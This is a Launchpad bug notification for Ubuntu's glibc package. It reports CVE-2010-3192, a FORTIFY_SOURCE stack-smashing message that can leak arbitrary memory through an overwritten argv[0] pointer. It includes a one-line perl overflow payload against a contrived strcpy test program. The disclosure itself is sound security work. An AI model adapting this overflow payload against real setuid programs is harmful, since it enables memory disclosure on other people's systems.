[Bug 562614] Re: Potential information disclosure vulnerability in FORTIFY_SOURCE
Jack Ren
562614 at bugs.launchpad.net
Tue Sep 7 12:20:19 UTC 2021
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3192
--
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to glibc in Ubuntu.
https://bugs.launchpad.net/bugs/562614
Title:
Potential information disclosure vulnerability in FORTIFY_SOURCE
Status in glibc package in Ubuntu:
Confirmed
Bug description:
The error message generated when stack smashing is detected on a
program compiled -D FORTIFY_SOURCE includes a reference to argv[0].
Since argv[0] resides further up the stack from an overflowed buffer,
if an application is vulnerable to a stack-based buffer overflow that
allows the attacker to overwrite this pointer, the error message will
print out arbitrary memory.
While this behavior requires the pre-existence of another
vulnerability to be considered a security issue, it doesn't seem like
a good idea to allow an attacker to read arbitrary memory of setuid
binaries (for example) in the event of a mitigated stack overflow.
I've attached a contrived example to reproduce the issue. It's a
classic strcpy() buffer overflow. An unused string is in the .data
section as a target to read. By executing:
./strcpy `perl -e 'print "\xa0\x85\x04\x08"x80'`
the string will be printed out in the FORTIFY_SOURCE error message.
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/glibc/+bug/562614/+subscriptions
More information about the foundations-bugs
mailing list